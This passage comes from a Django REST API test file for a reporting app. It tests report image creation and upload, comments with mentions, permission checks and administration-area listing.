self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
imageUrl = 'https://s3-ap-southeast-1.amazonaws.com/podd/fe97493f-fef7-4e8e-9b97-a179c43bd5fa'
params = {
"reportGuid": self.report.guid,
"guid": "dfdfdf0003434300343",
"imageUrl": imageUrl,
"thumbnailUrl": imageUrl,
"note": "fever",
"location": 'POINT(100.7522060000000010 13.8082770000000004)'
}
response = self.client.post(reverse('add_report_image'), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['guid'], 'dfdfdf0003434300343')
self.assertEqual(response_json['imageUrl'], imageUrl)
self.assertEqual(response_json['thumbnailUrl'], imageUrl)
self.assertEqual(response_json['note'], 'fever')
self.assertEqual(response_json['location']['latitude'], 13.8082770000000004)
self.assertEqual(response_json['location']['longitude'], 100.7522060000000010)
image = ReportImage.objects.latest('id')
self.assertEqual(image.report, self.report)
self.assertEqual(image.guid, 'dfdfdf0003434300343')
self.assertEqual(image.image_url, imageUrl)
self.assertEqual(image.thumbnail_url, imageUrl)
self.assertEqual(image.note, 'fever')
def test_post_api_report_image_invalid(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.post(reverse('add_report_image'))
self.assertEqual(response.status_code, 400)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportGuid'], 'Report is not found.')
params = {
"reportGuid": self.report.guid,
}
response = self.client.post(reverse('add_report_image'), params)
self.assertEqual(response.status_code, 400)
response_json = json.loads(response.content)
self.assertEqual(response_json['guid'], ['This field is required.'])
self.assertEqual(response_json['imageUrl'], ['This field is required.'])
self.assertEqual(response_json['thumbnailUrl'], ['This field is required.'])
def test_anonymous_cannot_access_api_report_image_create(self):
response = self.client.post(reverse('add_report_image'))
self.assertEqual(response.status_code, 401)
class TestApiReportImageUpload(APITestCase):
def setUp(self):
try:
ReportType.objects.get(id=0)
except ReportType.DoesNotExist:
ReportType.objects.create(
id=0,
name='Positive Report Type',
form_definition='{}',
version=0,
)
self.taeyeon = factory.create_user()
self.jessica = factory.create_user()
# get_temporary_file()
@patch('reports.api.upload_to_s3', mock_upload_to_s3)
def test_post_image_upload(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
m = mock_open()
with patch('__main__.open', m, create=True):
send_file = open('/tmp/hello.world.jpg', 'r')
params = {
'image': send_file,
}
content = encode_multipart('BoUnDaRyStRiNg', params)
content_type = 'multipart/form-data; boundary=BoUnDaRyStRiNg'
response = self.client.post(reverse('upload_report_image'), content, content_type=content_type)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['imageUrl'], 'hello.world.jpg')
self.assertEqual(response_json['thumbnailUrl'], 'hello.world-thumbnail.jpg')
def test_cannot_get_upload_report_image(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('upload_report_image'))
self.assertEqual(response.status_code, 405)
def test_anonymous_cannot_post_upload_report_image(self):
response = self.client.post(reverse('upload_report_image'))
self.assertEqual(response.status_code, 401)
class TestApiReportComment(APITestCase):
def setUp(self):
try:
ReportType.objects.get(id=0)
except ReportType.DoesNotExist:
ReportType.objects.create(
id=0,
name='Positive Report Type',
form_definition='{}',
version=0,
)
call_command('clear_index', interactive=False, verbosity=0)
self.taeyeon = factory.create_user()
self.jessica = factory.create_user()
self.yoona = factory.create_user()
self.krystal = factory.create_user()
self.authority = factory.create_authority()
self.authority.users.add(self.taeyeon)
self.authority.users.add(self.krystal)
self.type = factory.create_report_type(authority=self.authority)
self.area = factory.create_administration_area(authority=self.authority)
self.report = factory.create_report(created_by=self.taeyeon, type=self.type,
administration_area=self.area)
def test_post_api_report_comment_by_report_without_file(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"message": "Hello baby",
}
response = self.client.post(reverse('report-comment', args=[self.report.id]), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello baby')
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
self.assertEqual(comment.report, self.report)
self.assertEqual(comment.message, 'Hello baby')
self.assertEqual(comment.file_url, None)
self.assertEqual(comment.created_by, self.taeyeon)
def test_post_api_report_comment_by_report_without_file_and_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"message": "Hello baby",
}
response = self.client.post(reverse('report-comment', args=[self.report.id]), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello baby')
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
self.assertEqual(comment.report, self.report)
self.assertEqual(comment.message, 'Hello baby')
self.assertEqual(comment.file_url, None)
self.assertEqual(comment.created_by, self.krystal)
def test_post_api_report_comment_by_report_comment_without_file(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"reportId": self.report.id,
"message": "Hello baby",
}
response = self.client.post(reverse('reportcomment-list'), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello baby')
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
self.assertEqual(comment.report, self.report)
self.assertEqual(comment.message, 'Hello baby')
self.assertEqual(comment.file_url, None)
self.assertEqual(comment.created_by, self.taeyeon)
def test_post_api_report_comment_by_report_comment_without_file_and_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"reportId": self.report.id,
"message": "Hello baby",
}
response = self.client.post(reverse('reportcomment-list'), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello baby')
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
self.assertEqual(comment.report, self.report)
self.assertEqual(comment.message, 'Hello baby')
self.assertEqual(comment.file_url, None)
self.assertEqual(comment.created_by, self.krystal)
@patch('reports.api.upload_to_s3', mock_upload_to_s3)
def test_post_api_report_comment_by_report_with_file(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
m = mock_open()
with patch('__main__.open', m, create=True):
send_file = open('/tmp/hello.world.jpg', 'r')
params = {
"message": "Hello baby",
"file": send_file,
}
content = encode_multipart('BoUnDaRyStRiNg', params)
content_type = 'multipart/form-data; boundary=BoUnDaRyStRiNg'
response = self.client.post(reverse('report-comment', args=[self.report.id]), content, content_type=content_type)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello baby')
self.assertEqual(response_json['fileUrl'], 'hello.world.jpg')
comment = ReportComment.objects.latest('id')
self.assertEqual(comment.report, self.report)
self.assertEqual(comment.message, 'Hello baby')
self.assertEqual(comment.file_url, 'hello.world.jpg')
self.assertEqual(comment.created_by, self.taeyeon)
@patch('reports.api.upload_to_s3', mock_upload_to_s3)
def test_post_api_report_comment_by_report_with_file_and_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
m = mock_open()
with patch('__main__.open', m, create=True):
send_file = open('/tmp/hello.world.jpg', 'r')
params = {
"message": "Hello baby",
"file": send_file,
}
content = encode_multipart('BoUnDaRyStRiNg', params)
content_type = 'multipart/form-data; boundary=BoUnDaRyStRiNg'
response = self.client.post(reverse('report-comment', args=[self.report.id]), content, content_type=content_type)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello baby')
self.assertEqual(response_json['fileUrl'], 'hello.world.jpg')
comment = ReportComment.objects.latest('id')
self.assertEqual(comment.report, self.report)
self.assertEqual(comment.message, 'Hello baby')
self.assertEqual(comment.file_url, 'hello.world.jpg')
self.assertEqual(comment.created_by, self.krystal)
@patch('reports.api.upload_to_s3', mock_upload_to_s3)
def test_post_api_report_comment_by_report_comment_with_file(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
m = mock_open()
with patch('__main__.open', m, create=True):
send_file = open('/tmp/hello.world.jpg', 'r')
params = {
"reportId": self.report.id,
"message": "Hello baby",
"file": send_file,
}
content = encode_multipart('BoUnDaRyStRiNg', params)
content_type = 'multipart/form-data; boundary=BoUnDaRyStRiNg'
response = self.client.post(reverse('reportcomment-list'), content, content_type=content_type)
send_file.closed
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello baby')
self.assertEqual(response_json['fileUrl'], 'hello.world.jpg')
comment = ReportComment.objects.latest('id')
self.assertEqual(comment.report, self.report)
self.assertEqual(comment.message, 'Hello baby')
self.assertEqual(comment.file_url, 'hello.world.jpg')
self.assertEqual(comment.created_by, self.taeyeon)
@patch('reports.api.upload_to_s3', mock_upload_to_s3)
def test_post_api_report_comment_by_report_comment_with_file_and_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
m = mock_open()
with patch('__main__.open', m, create=True):
send_file = open('/tmp/hello.world.jpg', 'r')
params = {
"reportId": self.report.id,
"message": "Hello baby",
"file": send_file,
}
content = encode_multipart('BoUnDaRyStRiNg', params)
content_type = 'multipart/form-data; boundary=BoUnDaRyStRiNg'
response = self.client.post(reverse('reportcomment-list'), content, content_type=content_type)
send_file.closed
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello baby')
self.assertEqual(response_json['fileUrl'], 'hello.world.jpg')
comment = ReportComment.objects.latest('id')
self.assertEqual(comment.report, self.report)
self.assertEqual(comment.message, 'Hello baby')
self.assertEqual(comment.file_url, 'hello.world.jpg')
self.assertEqual(comment.created_by, self.krystal)
'''
@patch('reports.api.upload_to_s3', mock_upload_to_s3)
def test_post_api_report_comment_by_report_with_large_file(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
m = mock_open()
with patch('__main__.open', m, create=True):
send_file = open('/tmp/hello_large.world', 'r')
params = {
"message": "Hello baby",
"file": send_file,
}
content = encode_multipart('BoUnDaRyStRiNg', params)
content_type = 'multipart/form-data; boundary=BoUnDaRyStRiNg'
response = self.client.post(reverse('report-comment', args=[self.report.id]), content, content_type=content_type)
self.assertEqual(response.status_code, 400)
@patch('reports.api.upload_to_s3', mock_upload_to_s3)
def test_post_api_report_comment_by_report_comment_with_large_file(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
m = mock_open()
with patch('__main__.open', m, create=True):
send_file = open('/tmp/hello_large.world', 'r')
params = {
"reportId": self.report.id,
"message": "Hello baby",
"file": send_file,
}
content = encode_multipart('BoUnDaRyStRiNg', params)
content_type = 'multipart/form-data; boundary=BoUnDaRyStRiNg'
response = self.client.post(reverse('reportcomment-list'), content, content_type=content_type)
self.assertEqual(response.status_code, 400)
'''
def test_post_api_report_comment_wih_user_cannot_access_by_report(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
params = {
"message": "Hello baby",
}
response = self.client.post(reverse('report-comment', args=[self.report.id]), params)
self.assertEqual(response.status_code, 403)
def test_post_api_report_comment_wih_user_cannot_access_by_report_comment(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
params = {
"reportId": self.report.id,
"message": "Hello baby",
}
response = self.client.post(reverse('reportcomment-list'), params)
self.assertEqual(response.status_code, 403)
'''
def test_post_api_report_comment_on_area_that_child_of_permitted_administration_area_by_report(self):
area = self.area.add_child(name='Namsan', location=self.area.location)
report = factory.create_report(created_by=self.taeyeon, type=self.type,
administration_area=area)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"message": "I am Back",
}
response = self.client.post(reverse('report-comment', args=[report.id]), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], report.id)
self.assertEqual(response_json['message'], 'I am Back')
def test_post_api_report_comment_on_area_that_child_of_permitted_administration_area_by_report_with_authority(self):
area = self.area.add_child(name='Namsan', location=self.area.location)
report = factory.create_report(created_by=self.taeyeon, type=self.type,
administration_area=area)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"message": "I am Back",
}
response = self.client.post(reverse('report-comment', args=[report.id]), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], report.id)
self.assertEqual(response_json['message'], 'I am Back')
def test_post_api_report_comment_on_area_that_child_of_permitted_administration_area_by_report_comment(self):
area = self.area.add_child(name='Namsan', location=self.area.location)
report = factory.create_report(created_by=self.taeyeon, type=self.type,
administration_area=area)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"message": "I am Back",
"reportId": report.id,
}
response = self.client.post(reverse('reportcomment-list'), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], report.id)
self.assertEqual(response_json['message'], 'I am Back')
def test_post_api_report_comment_on_area_that_child_of_permitted_administration_area_by_report_comment_with_authority(self):
area = self.area.add_child(name='Namsan', location=self.area.location)
report = factory.create_report(created_by=self.taeyeon, type=self.type,
administration_area=area)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"message": "I am Back",
"reportId": report.id,
}
response = self.client.post(reverse('reportcomment-list'), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], report.id)
self.assertEqual(response_json['message'], 'I am Back')
'''
def test_post_api_report_mention_comment_by_report(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"message": "Hello @[%s]" % self.jessica.username,
}
response = self.client.post(reverse('report-comment', args=[self.report.id]), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s]' % self.jessica.username)
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention = Mention.objects.latest('id')
self.assertEqual(mention.comment.id, comment.id)
self.assertEqual(mention.mentioner, self.taeyeon)
self.assertEqual(mention.mentionee, self.jessica)
self.assertEqual(mention.is_notified, False)
def test_post_api_report_mention_comment_by_report_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"message": "Hello @[%s]" % self.jessica.username,
}
response = self.client.post(reverse('report-comment', args=[self.report.id]), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s]' % self.jessica.username)
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention = Mention.objects.latest('id')
self.assertEqual(mention.comment.id, comment.id)
self.assertEqual(mention.mentioner, self.krystal)
self.assertEqual(mention.mentionee, self.jessica)
self.assertEqual(mention.is_notified, False)
def test_post_api_report_mentions_comment_by_report(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"message": "Hello @[%s] @[%s]" % (self.jessica.username, self.yoona.username)
}
response = self.client.post(reverse('report-comment', args=[self.report.id]), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s] @[%s]' % (self.jessica.username, self.yoona.username))
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention1 = Mention.objects.filter(mentionee__id=self.jessica.id).latest('id')
self.assertEqual(mention1.comment.id, comment.id)
self.assertEqual(mention1.mentioner, self.taeyeon)
self.assertEqual(mention1.mentionee, self.jessica)
self.assertEqual(mention1.is_notified, False)
mention2 = Mention.objects.filter(mentionee__id=self.yoona.id).latest('id')
self.assertEqual(mention2.comment.id, comment.id)
self.assertEqual(mention2.mentioner, self.taeyeon)
self.assertEqual(mention2.mentionee, self.yoona)
self.assertEqual(mention2.is_notified, False)
def test_post_api_report_mentions_comment_by_report_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"message": "Hello @[%s] @[%s]" % (self.jessica.username, self.yoona.username)
}
response = self.client.post(reverse('report-comment', args=[self.report.id]), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s] @[%s]' % (self.jessica.username, self.yoona.username))
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention1 = Mention.objects.filter(mentionee__id=self.jessica.id).latest('id')
self.assertEqual(mention1.comment.id, comment.id)
self.assertEqual(mention1.mentioner, self.krystal)
self.assertEqual(mention1.mentionee, self.jessica)
self.assertEqual(mention1.is_notified, False)
mention2 = Mention.objects.filter(mentionee__id=self.yoona.id).latest('id')
self.assertEqual(mention2.comment.id, comment.id)
self.assertEqual(mention2.mentioner, self.krystal)
self.assertEqual(mention2.mentionee, self.yoona)
self.assertEqual(mention2.is_notified, False)
def test_post_api_report_myself_mentions_comment_by_report(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"message": "Hello @[%s]" % self.taeyeon.username
}
response = self.client.post(reverse('report-comment', args=[self.report.id]), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s]' % self.taeyeon.username)
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention = Mention.objects.latest('id')
self.assertEqual(mention.comment.id, comment.id)
self.assertEqual(mention.mentioner, self.taeyeon)
self.assertEqual(mention.mentionee, self.taeyeon)
self.assertEqual(mention.is_notified, True)
def test_post_api_report_myself_mentions_comment_by_report_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"message": "Hello @[%s]" % self.krystal.username
}
response = self.client.post(reverse('report-comment', args=[self.report.id]), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s]' % self.krystal.username)
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention = Mention.objects.latest('id')
self.assertEqual(mention.comment.id, comment.id)
self.assertEqual(mention.mentioner, self.krystal)
self.assertEqual(mention.mentionee, self.krystal)
self.assertEqual(mention.is_notified, True)
def test_post_api_report_mention_comment_by_report_comment(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"reportId": self.report.id,
"message": "Hello @[%s]" % self.jessica.username,
}
response = self.client.post(reverse('reportcomment-list'), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s]' % self.jessica.username)
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention = Mention.objects.latest('id')
self.assertEqual(mention.comment.id, comment.id)
self.assertEqual(mention.mentioner, self.taeyeon)
self.assertEqual(mention.mentionee, self.jessica)
self.assertEqual(mention.is_notified, False)
def test_post_api_report_mention_comment_by_report_comment_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"reportId": self.report.id,
"message": "Hello @[%s]" % self.jessica.username,
}
response = self.client.post(reverse('reportcomment-list'), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s]' % self.jessica.username)
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention = Mention.objects.latest('id')
self.assertEqual(mention.comment.id, comment.id)
self.assertEqual(mention.mentioner, self.krystal)
self.assertEqual(mention.mentionee, self.jessica)
self.assertEqual(mention.is_notified, False)
def test_post_api_report_mentions_comment_by_report_comment(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"reportId": self.report.id,
"message": "Hello @[%s] @[%s]" % (self.jessica.username, self.yoona.username)
}
response = self.client.post(reverse('reportcomment-list'), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s] @[%s]' % (self.jessica.username, self.yoona.username))
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention1 = Mention.objects.filter(mentionee__id=self.jessica.id).latest('id')
self.assertEqual(mention1.comment.id, comment.id)
self.assertEqual(mention1.mentioner, self.taeyeon)
self.assertEqual(mention1.mentionee, self.jessica)
self.assertEqual(mention1.is_notified, False)
mention2 = Mention.objects.filter(mentionee__id=self.yoona.id).latest('id')
self.assertEqual(mention2.comment.id, comment.id)
self.assertEqual(mention2.mentioner, self.taeyeon)
self.assertEqual(mention2.mentionee, self.yoona)
self.assertEqual(mention2.is_notified, False)
def test_post_api_report_mentions_comment_by_report_comment_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"reportId": self.report.id,
"message": "Hello @[%s] @[%s]" % (self.jessica.username, self.yoona.username)
}
response = self.client.post(reverse('reportcomment-list'), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s] @[%s]' % (self.jessica.username, self.yoona.username))
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention1 = Mention.objects.filter(mentionee__id=self.jessica.id).latest('id')
self.assertEqual(mention1.comment.id, comment.id)
self.assertEqual(mention1.mentioner, self.krystal)
self.assertEqual(mention1.mentionee, self.jessica)
self.assertEqual(mention1.is_notified, False)
mention2 = Mention.objects.filter(mentionee__id=self.yoona.id).latest('id')
self.assertEqual(mention2.comment.id, comment.id)
self.assertEqual(mention2.mentioner, self.krystal)
self.assertEqual(mention2.mentionee, self.yoona)
self.assertEqual(mention2.is_notified, False)
def test_post_api_report_myself_mentions_comment_by_report_comment(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"reportId": self.report.id,
"message": "Hello @[%s]" % self.taeyeon.username
}
response = self.client.post(reverse('reportcomment-list'), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s]' % self.taeyeon.username)
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention = Mention.objects.latest('id')
self.assertEqual(mention.comment.id, comment.id)
self.assertEqual(mention.mentioner, self.taeyeon)
self.assertEqual(mention.mentionee, self.taeyeon)
self.assertEqual(mention.is_notified, True)
def test_post_api_report_myself_mentions_comment_by_report_comment_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"reportId": self.report.id,
"message": "Hello @[%s]" % self.krystal.username
}
response = self.client.post(reverse('reportcomment-list'), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s]' % self.krystal.username)
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention = Mention.objects.latest('id')
self.assertEqual(mention.comment.id, comment.id)
self.assertEqual(mention.mentioner, self.krystal)
self.assertEqual(mention.mentionee, self.krystal)
self.assertEqual(mention.is_notified, True)
def test_get_api_report_comment_by_report(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"message": "Hello baby",
}
response = self.client.post(reverse('report-comment', args=[self.report.id]), params)
self.assertEqual(response.status_code, 201)
comment = ReportComment.objects.latest('id')
self.assertEqual(comment.report, self.report)
self.assertEqual(comment.message, 'Hello baby')
response = self.client.get(reverse('report-comments', args=[self.report.id]))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 2)
comment1 = response_json[0]
self.assertEqual(comment1['reportId'], self.report.id)
self.assertEqual(comment1['message'], u'@[%(username)s] ได้ทำการตั้งค่าสถานะเป็น %(state)s' %
{'username': self.report.created_by.username, 'state': 'Report'})
comment2 = response_json[1]
self.assertEqual(comment2['reportId'], self.report.id)
self.assertEqual(comment2['message'], 'Hello baby')
def test_get_api_report_comment_by_report_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"message": "Hello baby",
}
response = self.client.post(reverse('report-comment', args=[self.report.id]), params)
self.assertEqual(response.status_code, 201)
comment = ReportComment.objects.latest('id')
self.assertEqual(comment.report, self.report)
self.assertEqual(comment.message, 'Hello baby')
response = self.client.get(reverse('report-comments', args=[self.report.id]))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 2)
comment1 = response_json[0]
self.assertEqual(comment1['reportId'], self.report.id)
self.assertEqual(comment1['message'], u'@[%(username)s] ได้ทำการตั้งค่าสถานะเป็น %(state)s' %
{'username': self.report.created_by.username, 'state': 'Report'})
comment2 = response_json[1]
self.assertEqual(comment2['reportId'], self.report.id)
self.assertEqual(comment2['message'], 'Hello baby')
'''
def test_get_api_report_comment_that_area_is_child_of_permitted_administration_area_by_report_comment(self):
area = self.area.add_child(name='Namsan', location=self.area.location)
report = factory.create_report(created_by=self.taeyeon, type=self.type,
administration_area=area)
comment = factory.create_report_comment(report=report)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reportcomment-detail', args=[comment.id]))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], comment.report.id)
self.assertEqual(response_json['message'], comment.message)
def test_get_api_report_comment_that_area_is_child_of_permitted_administration_area_by_report_comment_with_authority(self):
area = self.area.add_child(name='Namsan', location=self.area.location)
report = factory.create_report(created_by=self.krystal, type=self.type,
administration_area=area)
comment = factory.create_report_comment(report=report)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
response = self.client.get(reverse('reportcomment-detail', args=[comment.id]))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], comment.report.id)
self.assertEqual(response_json['message'], comment.message)
'''
def test_get_api_report_comment_wih_user_cannot_access_by_report(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
response = self.client.get(reverse('report-comments', args=[self.report.id]))
self.assertEqual(response.status_code, 403)
class TestApiAdministrationAreaList(APITestCase):
def setUp(self):
try:
ReportType.objects.get(id=0)
except ReportType.DoesNotExist:
ReportType.objects.create(
id=0,
name='Positive Report Type',
form_definition='{}',
version=0,
)
self.taeyeon = factory.create_user()
self.jessica = factory.create_user()
self.yoona = factory.create_user()
self.minah = factory.create_user(is_superuser=True, is_staff=True)
self.krystal = factory.create_user()
self.authority = factory.create_authority()
self.authority.users.add(self.taeyeon)
self.authority.users.add(self.krystal)
self.authority_1 = factory.create_authority()
self.authority_1.users.add(self.jessica)
self.area1 = factory.create_administration_area(name='Seoul', authority=self.authority_1)
self.area2 = factory.create_administration_area(name='Tokyo', authority=self.authority)
self.area2_1 = self.area2.add_child(name='Namsan', location=self.area2.location)
self.area2_1_1 = self.area2_1.add_child(name='Namsan Tower', location=self.area2.location)
self.area3 = factory.create_administration_area(name='Chiang Mai', authority=self.authority)
self.authority_1.inherits.add(self.authority)
def test_api_list_administration_area(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('administrationarea-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 3)
area1 = response_json[0]
self.assertEqual(area1['id'], self.area3.id)
self.assertEqual(area1['name'], self.area3.name)
self.assertEqual(area1['address'], self.area3.address)
# self.assertEqual(area1['parentName'], '')
# self.assertEqual(area1['isLeaf'], True)
# area2 = response_json[1]
# self.assertEqual(area2['id'], self.area2_1.id)
# self.assertEqual(area2['name'], self.area2_1.name)
# self.assertEqual(area2['address'], self.area2_1.address)
# # self.assertEqual(area2['parentName'], self.area2.name)
# # self.assertEqual(area2['isLeaf'], False)
#
# area3 = response_json[2]
# self.assertEqual(area3['id'], self.area2_1_1.id)
# self.assertEqual(area3['name'], self.area2_1_1.name)
# self.assertEqual(area3['address'], self.area2_1_1.address)
# # self.assertEqual(area3['parentName'], self.area2_1.name)
# # self.assertEqual(area3['isLeaf'], True)
area4 = response_json[1]
self.assertEqual(area4['id'], self.area1.id)
self.assertEqual(area4['name'], self.area1.name)
self.assertEqual(area4['address'], self.area1.address)
